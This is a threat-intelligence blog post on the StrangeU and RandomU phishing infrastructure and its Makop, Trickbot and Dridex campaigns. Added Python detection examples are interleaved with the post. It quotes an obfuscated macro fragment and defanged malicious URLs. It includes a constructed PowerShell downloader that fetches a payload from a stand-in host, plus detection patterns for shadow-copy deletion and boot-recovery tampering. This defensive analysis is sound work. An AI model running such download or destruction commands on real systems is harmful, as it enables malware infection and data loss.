What tracking an attacker email infrastructure tells us about persistent cybercriminal operations

February 1st, 2021

From March to December 2020, we tracked segments of a dynamically generated email infrastructure that attackers used to send more than a million emails per month, distributing at least seven distinct malware families in dozens of campaigns using a variety of phishing lures and tactics. These campaigns aimed to deploy malware on target networks across the world, with notable concentration in the United States, Australia, and the United Kingdom. Attackers targeted the wholesale distribution, financial services, and healthcare industries.

By tracing these campaigns, we uncovered a sprawling infrastructure that is robust enough to seem legitimate to many mail providers, while flexible enough to allow the dynamic generation of new domain names and remain evasive. Shared IP space, domain generation algorithm (DGA) patterns, subdomains, registrations metadata, and signals from the headers of malicious emails enabled us to validate our research through overlaps in campaigns where attackers utilized multiple segments of purchased, owned, or compromised infrastructure. Using the intelligence we gathered on this infrastructure, we were at times able to predict how a domain was going to be used even before campaigns began.

This email infrastructure and the malware campaigns that use it exemplify the increasing sophistication of cybercriminal operations, driven by attackers who are motivated to use malware infections for more damaging, potentially more lucrative attacks. In fact, more recent campaigns that utilized this infrastructure distributed malware families linked to follow-on human-operated attacks, including campaigns that deployed Dopplepaymer, Makop, Clop, and other ransomware families.

Our deep investigation into this infrastructure brings to light these important insights about persistent cybercriminal operations:

  • Tracking an email infrastructure surfaces patterns in attacker activity, bubbling up common elements in seemingly disparate campaigns
  • Among domains that attackers use for sending emails, distributing malware, or command-and-control, the email domains are the most likely to share basic registration similarities and more likely to use DGA
  • Malware services rely on proxy providers to make tracking and attribution difficult, but the proxies themselves can provide insights into upcoming campaigns and improve our ability to proactively protect against them
  • Gaining intelligence on email infrastructures enables us to build or improve proactive and comprehensive protections like those provided by Microsoft Defender for Office 365 to defend against some of the world’s most active malware campaigns

While there is existing in-depth research into some of these specific campaigns, in this blog we’ll share more findings and details on how email distribution infrastructures drive some of the most prevalent malware operations today. Our goal is to provide important intelligence that hosting providers, registrars, ISPs, and email protection services can use and build on to protect customers from the threats of today and the future. We’ll also share insights and context to empower security researchers and customers to take full advantage of solutions like Microsoft Defender for Office 365 to perform deep investigation and hunting in their environment and make their organizations resilient against attacks.

The role of for-sale infrastructure services in the threat ecosystem

We spotted the first segment of the infrastructure in March, when multiple domains were registered using distinct naming patterns, including heavy use of the word “strange”, inspiring the name StrangeU. In April, registration began for a second segment of the infrastructure, one that used a domain generation algorithm (DGA). We call this segment RandomU.

The emergence of this infrastructure in March dovetailed with the disruption of the Necurs botnet that resulted in the reduction of service. Before being disrupted, Necurs was one of the world’s largest botnets and was used by prolific malware campaign operators such as those behind Dridex. For-sale services like Necurs enable attackers to invest in malware production while leasing the delivery components of their activities to further obfuscate their behavior. The StrangeU and RandomU infrastructure appear to fill in the service gap that the Necurs disruption created, proving that attackers are highly motivated to quickly adapt to temporary interruptions to their operations.

[Graph: timeline of the Necurs takedown and the staging and operation of StrangeU and RandomU]

Figure 1. Timeline of staging and utilization of the email infrastructure

At first, the new email infrastructure was used infrequently in campaigns that distributed highly commodity malware like Mondfoxia and Makop. Soon, however, it attracted the attention of Dridex and Trickbot operators, who began using the infrastructure for portions of their campaigns, sometimes entirely and sometimes mixed with other compromised infrastructure or email providers.

Analyzing these mail clusters shows how human-driven the tangled web of modular attacker infrastructure remains. From the unifying traits in registration and behavior to the simple and effective techniques shared by a wide variety of malware, the attackers’ goal in this diversification is to defeat automated analysis. However, these same shared characteristics and methods translate into insights that inform resilient protections against these attacks.

Domain registration and email infrastructure staging

On March 7, 2020, attackers began registering a series of domains with Namecheap using sets of stolen email addresses, largely from free email services like mail.com, mail.ru, list.ru, and others. These domains all had similar characteristics that could be linked back to various similarities in registration. Almost all of the registered domains contained the word “strange” and were under the .us TLD, hence the name StrangeU. The choice of the .us TLD meant the attackers could not use domain or WHOIS privacy services—often used to obfuscate domain ownership and provenance—because those services are prohibited for this TLD.

To circumvent tracking and detection of these domains, attackers used false registration metadata. However, there was heavy crossover in the fake names and email addresses, allowing us to find additional domain names, some of which could be tied together using other keywords as shown in the list below, and fingerprint the domain generation mechanism.

The StrangeU domains were registered in early March 2020 and operated in continuous small bursts until April, when they were used for a large ransomware campaign. Following that, a new campaign occurred fairly regularly every few weeks. Registration of new domains continued throughout the year, and in September, the StrangeU infrastructure was used in conjunction with a similar infrastructure to deliver Dridex, after which these domains were used less frequently.

This second mailing segment, RandomU, employed a different DGA mechanism but still utilized Namecheap and showed a more consistent through-line of registration metadata than its StrangeU counterpart. This infrastructure, which surfaced in April, was used infrequently through the spring, with surges in May and July. After the September Dridex campaign in which it was used along with StrangeU, it has been used in two large Dridex campaigns every month.
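The fingerprinting described above, as an added example that is not code from the original post: StrangeU names are split into a prefix, a short filler, a core keyword and suffix tokens, and the tallies show which components the registrations share. The core keywords are taken from the detection regex published later in the post; the prefix and suffix vocabularies are assumptions read off the post's StrangeU domain list and would need extending as new registrations appear. RandomU-style names, which carry no core keyword, fall through as unmatched, which is itself the signal that a different generator is in play.

```python
"""Fingerprint StrangeU-style domains by splitting them into prefix, filler, core keyword
and suffix tokens, then tally which tokens the registrations share.

Added example, not code from the original post. Prefix and suffix vocabularies are
assumptions read off the post's domain list."""
from collections import Counter

CORES = ("strange", "stange", "emailboost")
PREFIXES = sorted(
    ("eraust", "ereply", "reply", "ereceived", "received", "reaust", "reauesty", "ereauesty",
     "esend", "send", "inv", "emailboost", "eontay", "eprop", "frost", "eont",
     "servicply", "servicceived"),
    key=len, reverse=True)            # longest match first
SUFFIXES = sorted(
    ("secure", "asia", "digital", "lifes", "life", "network", "rocks", "world",
     "today", "vip", "us", "best", "club", "live"),
    key=len, reverse=True)


def refang(domain: str) -> str:
    """Turn the defanged form used in the post (name[.]us) back into a real name."""
    return domain.replace("[.]", ".").lower()


def _split_suffixes(tail: str):
    """Tolerate up to two filler characters, then peel known suffix tokens greedily."""
    filler = ""
    for skip in (0, 1, 2):
        if any(tail[skip:].startswith(s) for s in SUFFIXES):
            filler, tail = tail[:skip], tail[skip:]
            break
    tokens = []
    while tail:
        tok = next((s for s in SUFFIXES if tail.startswith(s)), None)
        if tok is None:
            break
        tokens.append(tok)
        tail = tail[len(tok):]
    return filler, tuple(tokens), tail


def decompose(domain: str):
    """Token structure of a StrangeU-style .us domain, or None if no core keyword is present."""
    label = refang(domain)
    if not label.endswith(".us"):
        return None
    label = label[:-3]
    hits = [(label.find(c), c) for c in CORES if c in label]
    if not hits:
        return None
    idx, core = min(hits)                        # earliest core keyword wins
    head, tail = label[:idx], label[idx + len(core):]
    prefix = next((p for p in PREFIXES if head.startswith(p)), "")
    post_filler, suffixes, leftover = _split_suffixes(tail)
    return {
        "prefix": prefix,
        "filler": head[len(prefix):] + post_filler,  # glue characters such as "s" or "gg"
        "core": core,
        "suffixes": suffixes,
        "leftover": leftover,                        # unparsed remainder, e.g. a repeated prefix
    }


def summarize(domains):
    """Tally shared tokens across a set of domains; names without a core are listed separately."""
    stats = {"prefix": Counter(), "core": Counter(), "suffix": Counter(), "unmatched": []}
    for d in domains:
        parts = decompose(d)
        if parts is None:
            stats["unmatched"].append(refang(d))
            continue
        stats["prefix"][parts["prefix"] or "<none>"] += 1
        stats["core"][parts["core"]] += 1
        stats["suffix"].update(parts["suffixes"])
    return stats


# Sample drawn from the domains listed in the post (StrangeU first, then RandomU).
SAMPLE = [
    "ereceivedsstrangesecureworld[.]us", "ereplyggstangeasia[.]us", "emailboostgedigital[.]us",
    "servicplysstrangenetwork[.]us", "reauestysstrangesecurevip[.]us", "invdeliverynows[.]us",
    "cnewyllansf[.]us", "kibintiwl[.]us",
]

if __name__ == "__main__":
    for d in SAMPLE:
        print(refang(d), "->", decompose(d))
    print(summarize(SAMPLE))
```

Note that names such as invdeliverynows[.]us belong to StrangeU but carry none of the core keywords, so neither this decomposition nor the post's regex catches them; registration metadata, not the name alone, is what ties those in.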

[Table: observed patterns in the StrangeU and RandomU infrastructures]

Figure 2. Common patterns in domains belonging to the email infrastructure

The StrangeU and RandomU segments of domains paint a picture of supplementary, modular mailing services that allowed attackers to launch region-specific and enterprise-targeting attacks at scale, delivering over six million emails. The two segments contained a standard barrage of mailing subdomains, with over 60 unique subdomains referencing email across clusters, consistent with each other, and with each domain having four to five subdomains. The following is a sample of the malware campaigns for which we observed this infrastructure being used, some of which we discuss in detail in succeeding sections:

  • Korean spear-phishing campaigns that delivered Makop ransomware in April and June
  • Emergency alert notifications that distributed Mondfoxia in April
  • Black Lives Matter lure that delivered Trickbot in June
  • Dridex campaign delivered through StrangeU and other infra from June to July
  • Dofoil (SmokeLoader) campaign in August
  • Emotet and Dridex activities in September, October, and November

[Timeline: campaigns using the StrangeU and RandomU infrastructures]

Figure 3. Timeline of campaigns that used StrangeU and RandomU domains

Korean spear-phishing delivers Makop ransomware (April and June 2020)

In early April, StrangeU was used to deliver the Makop ransomware. The emails were sent to organizations that had major business operations in Korea and used names of Korean companies as display names. Signals from Microsoft Defender for Office 365 indicated that these campaigns ran in short bursts.

The emails had .zip attachments containing executables with file names that resembled resumes from job seekers. Once a user opened the attachments, the executables delivered Makop, a ransomware-as-a-service (RaaS) payload that targeted devices and backups.

Upon infection, the malware quickly used the WMI command-line (WMIC) utility to delete shadow copies. It then used the BCDEdit tool to alter the boot configuration to ignore future failures and prevent restoration, before encrypting all files and renaming them with the .makop extension.

The second time we observed the campaign almost two months later, in early June, the attackers used a Makop ransomware variant with many modified elements, including added persistence via scripts in the Startup folder before triggering a reboot.

Nearly identical attempts to deliver Makop using resume-based lures were covered by Korean security media during the entire year, using popular mail services through legitimate vendors like Naver and Hanmail. This could indicate that during short bursts the Makop operators were unable to launch their campaigns through legitimate services and had to move to alternate infrastructures like StrangeU instead.

Black Lives Matter lure delivers Trickbot (June 2020)

One campaign associated with the StrangeU infrastructure gained notoriety in mid-June for its lure as well as for delivering the notorious info-stealing malware Trickbot. This campaign circulated emails with malicious Word documents claiming to seek anonymous input on the Black Lives Matter movement.

An initial version of this campaign was observed on June 10 sending emails from a separate, unique attacker-owned mailing infrastructure using .monster domains. However, in the next iteration almost two weeks later, the campaign delivered emails from various domains specifically created with the Black Lives Matter signage, interspersed with StrangeU domains:

  • b-lives-matter[.]site
  • blivesm[.]space
  • blivesmatter[.]site
  • lives-matter-b[.]xyz
  • whoslivesmatter[.]site
  • lives-m-b[.]xyz
  • ereceivedsstrangesecureworld[.]us
  • b-l-m[.]site

Both campaigns carried the same Trickbot payload, operated for two days, and used identical post-execution commands and callouts to compromised WordPress sites.

Once a user opened the document attachment and enabled the malicious macro, Word launched cmd.exe with the command “/c pause” to evade security tools that monitored for successive launches of multiple processes. It then launched commands that deleted proxy settings in preparation for connecting to multiple C2 IP addresses.

[Screenshot: malicious document]

Figure 4. Screenshot of the malicious document used to deliver Trickbot

The commands also launched rundll32.exe, a native binary commonly used as a living-off-the-land binary, to load a malicious file in memory. The commandeered rundll32.exe also proceeded to perform other tasks using other living-off-the-land binaries, including wermgr.exe and svchost.exe.

In turn, the hijacked wermgr.exe process dropped a file with a .dog extension that appeared to be the Trickbot payload. The same instance of wermgr.exe then appeared to inject code into svchost.exe and scanned for open SMB ports on other devices. The commandeered svchost.exe used WMI to open connections to additional devices on the network, while continuing to collect data from the initial infected device. It also opened multiple browsers on localhost connections to capture browser history and other information via esentutl.exe and grabber_temp.edb, both of which are often used by the Trickbot malware family.
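The behaviours described in the Makop section (shadow-copy deletion via WMIC, boot-configuration tampering via BCDEdit) and in this Trickbot section (Office launching cmd.exe with "/c pause", rundll32.exe descending from the Office process and in turn spawning wermgr.exe) can all be expressed as rules over process-creation telemetry. The following is an added example, not code from the original post: the event schema, the sample events and every file name in them are constructed, and the exact bcdedit switches are an assumption, the standard ones that disable recovery rather than a command quoted in the post.

```python
"""Match process-creation telemetry against the command lines and process lineage
described for the Makop and Trickbot campaigns.

Added example, not the post's code. Event schema and sample events are constructed."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str       # executable file name, lower-case
    cmdline: str


OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}

# (rule name, ancestor image set, child image, command-line predicate or None, hops to search)
LINEAGE_RULES = [
    ("office_spawns_cmd_pause", OFFICE, "cmd.exe", lambda c: "/c pause" in c.lower(), 1),
    ("office_descendant_rundll32", OFFICE, "rundll32.exe", None, 2),
    ("rundll32_spawns_wermgr", {"rundll32.exe"}, "wermgr.exe", None, 1),
]

# Assumption: these are the usual shadow-copy and boot-recovery commands; the post
# names the tools (WMIC, BCDEdit) and the effect, not the literal command lines.
CMDLINE_RULES = [
    ("shadow_copy_deletion",
     re.compile(r"\b(?:wmic(?:\.exe)?\s+shadowcopy\s+delete|vssadmin(?:\.exe)?\s+delete\s+shadows)", re.I)),
    ("boot_recovery_tamper",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*\b(?:bootstatuspolicy\s+ignoreallfailures|recoveryenabled\s+no)\b", re.I)),
]


def ancestors(event, by_pid, hops):
    """Walk up the parent chain at most `hops` steps (stops at an unknown parent)."""
    chain, cur = [], event
    for _ in range(hops):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            break
        chain.append(cur)
    return chain


def evaluate(events):
    """Return (rule name, pid) pairs for every event that satisfies a rule."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        for name, parents, child, pred, hops in LINEAGE_RULES:
            if e.image != child or (pred is not None and not pred(e.cmdline)):
                continue
            if any(a.image in parents for a in ancestors(e, by_pid, hops)):
                hits.append((name, e.pid))
        for name, rx in CMDLINE_RULES:
            if rx.search(e.cmdline):
                hits.append((name, e.pid))
    return hits


# Constructed sample: a Trickbot-style chain, a Makop-style chain, and benign noise.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "winword.exe", r'WINWORD.EXE /n "C:\Users\u\Downloads\survey.docm"'),
    ProcEvent(300, 200, "cmd.exe", "cmd.exe /c pause"),
    ProcEvent(400, 300, "rundll32.exe", r"rundll32.exe C:\Users\u\AppData\Local\Temp\loader.dll,StartW"),
    ProcEvent(500, 400, "wermgr.exe", "wermgr.exe"),
    ProcEvent(600, 100, "resume.exe", r"C:\Users\u\Downloads\resume.exe"),
    ProcEvent(700, 600, "wmic.exe", "wmic shadowcopy delete"),
    ProcEvent(800, 600, "bcdedit.exe", "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    ProcEvent(900, 600, "bcdedit.exe", "bcdedit /set {default} recoveryenabled no"),
    ProcEvent(1000, 100, "cmd.exe", "cmd.exe /c dir"),                                  # benign
    ProcEvent(1100, 1000, "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),   # benign
]

if __name__ == "__main__":
    for rule, pid in evaluate(SAMPLE_EVENTS):
        print(f"{rule:28s} pid={pid}")
```

The lineage rules look a bounded number of hops up the tree rather than only at the direct parent, which is what catches rundll32.exe launched through the intermediate cmd.exe; the benign rundll32.exe under explorer.exe stays clean because no Office process sits within two hops.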

This campaign overwhelmingly targeted corporate accounts in the United States and Canada and avoided individual accounts. Despite heavy media coverage, this campaign was relatively small, reflecting a common behavior among cybercrime groups, which often run multiple, dynamic low-volume campaigns designed to evade resilient detection.

Dridex campaigns big and small (June to July 2020 and beyond)

From late June through July, Dridex operators ran numerous campaigns that distributed Excel documents with malicious macros to infect devices. These operators first delivered emails through the StrangeU infrastructure only, but they quickly started to use compromised email accounts of legitimate organizations as well, preventing defenders from easily blocking deliveries. Despite this, emails from either StrangeU or the compromised accounts had overlapping attributes. For example, many of the emails used the same Reply-To addresses, which were sourced from compromised individual accounts and were not consistent with the sender addresses.

During the bulk of this run, Excel files were attached directly in the email in order to eventually pull the Dridex payload from .xyz domains such as those below. The attackers changed the delivery domains every few days and connected to IP-based C2s on familiar ports like 4664, 3889, 691, and 8443:

  • yumicha[.]xyz
  • rocesi[.]xyz
  • secretpath[.]xyz
  • guruofbullet[.]xyz
  • Greyzone[.]xyz

When opened, the Excel document installed one of a series of custom Dridex executables downloaded from the attacker C2 sites. Like most variants in this malware family, the custom Dridex executables incorporated code loops, time delays, and environment detection mechanisms that evaded numerous public and enterprise sandboxes.

Dridex is known for its capability to perform credential theft and establish connectivity to attacker infrastructure. In this instance, the same Dridex payload was circulated daily using varying lures, often repeatedly to the same organizations to ensure execution on target networks.

During the longer and more stable Excel Dridex campaigns in June and July, a Dridex variant was also distributed in much smaller quantities utilizing Word documents over a one-day period, perhaps testing new evasion techniques. These Word documents, while still delivering Dridex, improved existing obfuscation methods using a unique combination of VBA stomping and replacing macros and function calls with arbitrary text. In a few samples of these documents, we found text from Shakespearean prose.

<ms:script>
var farewell_and_moon = ["m","a","e","r","t","s",".","b","d","o","d","a"].reverse().join("")
a_painted_word(120888)
function as_thy_face(takes_from_hamlet)
{return new ActiveXObject(takes_from_hamlet)}
</ms:script>

While Microsoft researchers didn’t observe this portion of the campaign moving into the human-operated phase—targets did not open the attachment—this campaign was likely to introduce tools like PowerShell Empire or Cobalt Strike to steal credentials, move laterally, and deploy ransomware.

Emotet, Dridex, and the RandomU infrastructure (September and beyond)

Despite an errant handful of deliveries distributing Dofoil (also known as SmokeLoader) and other malware, the vast majority of the remaining deliveries through StrangeU have been Dridex campaigns that recurred every few weeks for a handful of days at a time. These campaigns started on September 7, when RandomU and StrangeU were notably used in a single campaign, after which StrangeU began to see less utilization.

These Dridex campaigns utilized an Emotet loader and initial infrastructure for hosting, allowing the attackers to conduct a highly modular email campaign that delivered multiple distinct links to compromised domains. These domains employed heavy sandbox evasion and were connected by a series of PHP patterns ending in a small subset of options: zxlbw.php, yymclv.php, zpsxxla.php, or app.php. As the campaigns continued, the PHP file names were dynamically generated, adding other variants, including vary.php, invoice.php, share.php, and many others. Some examples are below.

  • hxxps://molinolafama[.]com[.]mx/app[.]php
  • hxxps://meetingmins[.]com/app[.]php
  • hxxps://contrastmktg[.]com/yymclv[.]php
  • hxxps://idklearningcentre[.]com[.]ng/zxlbw[.]php
  • hxxps://idklearningcentre[.]com[.]ng/zpsxxla[.]php
  • hxxps://idklearningcentre[.]com[.]ng/yymclv[.]php
  • hxxps://hsa[.]ht/yymclv[.]php
  • hxxps://hsa[.]ht/zpsxxla[.]php
  • hxxps://hsa[.]ht/zxlbw[.]php
  • hxxps://track[.]topad[.]co[.]uk/zpsxxla[.]php
  • hxxps://seoemail[.]com[.]au/zxlbw[.]php
  • hxxps://bred[.]fr-authentification-source-no[.]inaslimitada[.]com/zpsxxla[.]php
  • hxxp://www[.]gbrecords[.]london/zpsxxla[.]php
  • hxxp://autoblogsite[.]com/zpsxxla[.]php
  • hxxps://thecrossfithandbook[.]com/zpsxxla[.]php
  • hxxps://mail[.]168vitheyrealestate[.]com/zpsxxla[.]php
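Matching the list above against web proxy logs, as an added example that is not code from the original post. The indicators are refanged from the post's own defanged form and matched in two tiers: an exact host-and-path hit, or only one of the distinctive script names on a host not in the list, which is a hunting lead rather than a block decision. The proxy log format and the log lines are constructed.

```python
"""Refang the post's defanged URL indicators and match proxy log entries against them.

Added example, not the post's code. Proxy log format and lines are constructed; the
indicator list is a subset of the URLs given in the post."""
from urllib.parse import urlsplit

DEFANGED_IOCS = [
    "hxxps://molinolafama[.]com[.]mx/app[.]php",
    "hxxps://meetingmins[.]com/app[.]php",
    "hxxps://contrastmktg[.]com/yymclv[.]php",
    "hxxps://hsa[.]ht/yymclv[.]php",
    "hxxps://hsa[.]ht/zpsxxla[.]php",
    "hxxps://hsa[.]ht/zxlbw[.]php",
    "hxxp://autoblogsite[.]com/zpsxxla[.]php",
]

# Script names unusual enough to be worth a path-only match. app.php, invoice.php and
# share.php also appear in the campaign but are far too common to flag on their own.
DISTINCTIVE_SCRIPTS = {"zxlbw.php", "yymclv.php", "zpsxxla.php"}


def refang(s: str) -> str:
    return s.replace("hxxp", "http").replace("[.]", ".")


def normalize(url: str):
    """(host, path) key; hostname is lower-cased, an empty path becomes '/'."""
    parts = urlsplit(url)
    return (parts.hostname or "").lower(), parts.path or "/"


KNOWN = {normalize(refang(u)) for u in DEFANGED_IOCS}


def classify(url: str):
    host, path = normalize(url)
    if (host, path) in KNOWN:
        return "known_ioc"
    if path.rsplit("/", 1)[-1].lower() in DISTINCTIVE_SCRIPTS:
        return "suspicious_path"
    return None


def scan(log_text: str):
    """Return (client, url, verdict) for each matching line; format: ts client method url status."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        verdict = classify(fields[3])
        if verdict:
            hits.append((fields[1], fields[3], verdict))
    return hits


# Constructed proxy log lines; the unlisted host and the .example names are placeholders.
PROXY_LOG = """\
2020-09-08T10:01:12Z 10.0.0.5 GET https://hsa.ht/yymclv.php 200
2020-09-08T10:01:13Z 10.0.0.5 GET https://www.example.com/index.html 200
2020-09-08T10:02:40Z 10.0.0.7 GET https://unlisted-host.example/zpsxxla.php 302
2020-09-08T10:03:01Z 10.0.0.9 GET https://MOLINOLAFAMA.com.mx/app.php 200
2020-09-08T10:03:05Z 10.0.0.9 GET https://www.example.com/app.php 200
"""

if __name__ == "__main__":
    for client, url, verdict in scan(PROXY_LOG):
        print(f"{verdict:16s} {client:10s} {url}")
```

The key deliberately ignores the scheme and the query string, so an http fetch of an indicator that was listed as https still matches; the last log line shows why app.php alone is not a usable indicator.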

In this campaign, sandboxes were frequently redirected to unrelated sites like chemical manufacturers or medical suppliers, while users received an Emotet downloader within a Word document, which once again used macros to facilitate malicious activities.

[Screenshot: malicious document]

Figure 5. Screenshot of the malicious document used to deliver Dridex

The malicious macro utilized WMI to run a series of standard PowerShell commands. First, it downloaded the executable payload itself by contacting a series of C2 domains associated with Emotet campaigns since July. Afterward, additional encoded PowerShell commands were used in a similar fashion to download a .zip file that contained a Dridex DLL. Additional commands also reached out to a variety of Emotet infrastructure hosted on compromised WordPress administrative pages, even after the Dridex payload had already been downloaded. Dridex then modified Run keys so that the Dridex executable, renamed to riched20.exe, started automatically on subsequent logons.

We also observed simultaneous connections to associated Dridex and Emotet infrastructure. These connections were largely unencrypted and occurred over a variety of ports and services, including ports 4664 and 9443. At this point the malware had firm presence on the machine, enabling attackers to perform human-operated activity at a later date.
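The encoded PowerShell stage described above is opaque in raw process telemetry until the -EncodedCommand argument is decoded (base64 over UTF-16LE). The following is an added example, not code from the original post, that decodes such arguments from a command line and pulls out the URLs and download primitives they contain; the command lines, host name and file path are constructed, and encode_command() exists only to build the sample. Malformed or truncated arguments are reported as undecodable rather than raising.

```python
"""Decode PowerShell -EncodedCommand arguments from process command lines and extract
download indicators.

Added example, not the post's code. Sample command lines are constructed."""
import base64
import binascii
import re

ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RX = re.compile(r"https?://[^\s'\"()]+", re.I)
DOWNLOAD_RX = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|Net\.WebClient", re.I)


def encode_command(script: str) -> str:
    """PowerShell expects the script as base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(cmdline: str):
    """Return the decoded script, or None when no valid encoded argument is present."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> dict:
    """Decode the command line (if encoded) and summarise what it fetches."""
    script = decode_command(cmdline)
    if script is None:
        return {"encoded": False, "script": None, "urls": [], "download": False}
    return {
        "encoded": True,
        "script": script,
        "urls": URL_RX.findall(script),
        "download": bool(DOWNLOAD_RX.search(script)),
    }


# Constructed sample: a downloader that stages a payload under the name riched20.exe,
# the file name the post reports for the persisted Dridex executable. Host is a placeholder.
SAMPLE_SCRIPT = (
    "$u='http://payload.example/zxlbw.php';"
    "(New-Object Net.WebClient).DownloadFile($u, \"$env:TEMP\\riched20.exe\")"
)
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -Enc " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(analyze(SAMPLE_CMDLINE))
    print(analyze("powershell.exe -NoProfile -Command Get-Date"))
```

Because the macro launches PowerShell through WMI, the parent of these processes is the WMI provider host rather than the Office application, so the decoded content, not the lineage, is often the only thing that ties the command back to the document.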

In the past, reports have confirmed Dridex being delivered via leased Emotet infrastructure. There have also been many IP and payload-based associations. This research adds to that body of work and confirms additional associations via namespace, as well as correlation of email lure, metadata, and sender. This iteration of campaign repeated through October to December largely unchanged with nearly identical mails.

Defending organizations against malware campaigns

As attacks continue to grow in modularity, the tactics that attackers use to deliver phishing email, gain initial access on systems, and move laterally will continuously become more varied. This research shows that despite these disparities and the increased resiliency attackers have built, the core tactics and tools that they use are still limited in scope, relying repeatedly on familiar malicious macros, lures, and sending tactics.

Sweeping research into massive attacker infrastructures, as well as our real-time monitoring of malware campaigns and attacker activity, directly inform Microsoft security solutions, allowing us to build or improve protections that block malware campaigns and other email threats, both current and future, as well as provide enterprises with the tools for investigating and responding to email campaigns in real-time.

Microsoft delivers these capabilities through Microsoft Defender for Office 365. Features like Safe Attachments and Safe Links ensure real-time, dynamic protection against email campaigns no matter the lure or evasion tactic. These features use a combination of detonation, automated analysis, and machine learning to detect new and unknown threats. Meanwhile, the Campaign view shows the complete picture of email campaigns as they happen, including timelines, sending patterns, impact to the organization, and details like IP addresses, senders, and URLs. These insights into email threats empower security operations teams to respond to attacks, perform additional hunting, and fix configuration issues.

Armed with an advanced solution like Microsoft Defender for Office 365 and the rest of the technologies in the broader Microsoft 365 Defender solution, enterprises can further increase resilience against threats by following these recommendations:

  • Educate end users about protecting personal and business information in social media, filtering unsolicited communication, identifying lures in spear-phishing email, and reporting of reconnaissance attempts and other suspicious activity.
  • Configure Office 365 email filtering settings to ensure blocking of phishing & spoofed emails, spam, and emails with malware. Set Office 365 to recheck links on click and delete sent mail to benefit from newly acquired threat intelligence.
  • Disallow macros or allow only macros from trusted locations. See the latest security baselines for Office and Office 365.
  • Turn on AMSI for Office VBA.
  • Check perimeter firewall and proxy to restrict servers from making arbitrary connections to the internet to browse or download files. Turn on network protection to block connections to malicious domains and IP addresses. Such restrictions help inhibit malware downloads and command-and-control activity.

Turning on attack surface reduction rules, including rules that can block advanced macro activity, executable content, process creation, and process injection initiated by Office applications, also significantly improves defenses. The following rules are especially useful in blocking the techniques observed in campaigns using the StrangeU and RandomU infrastructure:

Microsoft 365 customers can also use the advanced hunting capabilities in Microsoft 365 Defender, which integrates signals from Microsoft Defender for Office 365 and other solutions, to locate activities and artifacts related to the infrastructure and campaigns discussed in this blog. These queries can be used with advanced hunting in Microsoft 365 security center, but the same regex pattern can be used on other security tools to identify or block emails.

This query searches for emails sent from StrangeU email addresses.

EmailEvents
| where SenderMailFromDomain matches regex @"^(?:eraust|ereply|reply|ereceived|received|reaust|esend|inv|send|emailboost|eontaysstrange|eprop|frost|eont|servicply).*(strange|stange|emailboost).*\.us$"
or SenderFromDomain matches regex @"^(?:eraust|ereply|reply|ereceived|received|reaust|esend|inv|send|emailboost|eontaysstrange|eprop|frost|eont|servicply).*(strange|stange|emailboost).*\.us$"
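The same regex applied outside advanced hunting, as an added example that is not code from the original post. It checks both the envelope sender (Return-Path, the MAIL FROM analogue of SenderMailFromDomain) and the header From (SenderFromDomain), and additionally flags a Reply-To domain that disagrees with the From domain, the trait the Dridex section above notes for mail sent through StrangeU and through compromised accounts alike. The raw messages and every address in them are constructed; the regex is the one published in the query.

```python
"""Apply the post's StrangeU sender-domain regex to parsed messages and flag Reply-To
domains that disagree with the sender.

Added example, not the post's code. Messages and addresses are constructed."""
import re
from email import message_from_string
from email.utils import parseaddr

STRANGEU_RX = re.compile(
    r"^(?:eraust|ereply|reply|ereceived|received|reaust|esend|inv|send|emailboost"
    r"|eontaysstrange|eprop|frost|eont|servicply).*(strange|stange|emailboost).*\.us$")


def domain_of(header_value) -> str:
    """Lower-cased domain part of the first address in a header, or '' if absent."""
    addr = parseaddr(header_value or "")[1]
    return addr.rpartition("@")[2].lower()


def analyze_message(raw: str) -> dict:
    msg = message_from_string(raw)
    envelope = domain_of(msg.get("Return-Path"))   # MAIL FROM analogue
    header_from = domain_of(msg.get("From"))
    reply_to = domain_of(msg.get("Reply-To"))
    findings = []
    if STRANGEU_RX.search(envelope) or STRANGEU_RX.search(header_from):
        findings.append("strangeu_sender_domain")
    if reply_to and reply_to != header_from:
        findings.append("reply_to_domain_mismatch")
    return {"envelope": envelope, "from": header_from, "reply_to": reply_to, "findings": findings}


# Constructed messages: a StrangeU sender, a compromised-account sender sharing the same
# Reply-To, a benign newsletter, and a lookalike outside the .us TLD.
MSG_STRANGEU = """\
Return-Path: <billing@ereceivedsstrangesecureworld.us>
From: "Accounts Payable" <billing@ereceivedsstrangesecureworld.us>
Reply-To: <j.doe@mailbox.example>
Subject: Invoice 4471

Please see attached.
"""
MSG_COMPROMISED = """\
Return-Path: <staff@partner.example>
From: "Staff" <staff@partner.example>
Reply-To: <j.doe@mailbox.example>
Subject: Invoice 4471

Please see attached.
"""
MSG_BENIGN = """\
Return-Path: <news@newsletter.example>
From: News <news@newsletter.example>
Subject: Weekly digest

Hello.
"""
MSG_LOOKALIKE = """\
Return-Path: <info@replystrangemail.com>
From: <info@replystrangemail.com>
Subject: Hi

Hello.
"""

if __name__ == "__main__":
    for raw in (MSG_STRANGEU, MSG_COMPROMISED, MSG_BENIGN, MSG_LOOKALIKE):
        print(analyze_message(raw))
```

The second message is the case the regex alone misses: a legitimate domain sending the same lure with the same foreign Reply-To. Grouping findings by Reply-To domain across a mailbox or tenant is what surfaces that overlap.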

Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.

Indicators of compromise

StrangeU domains

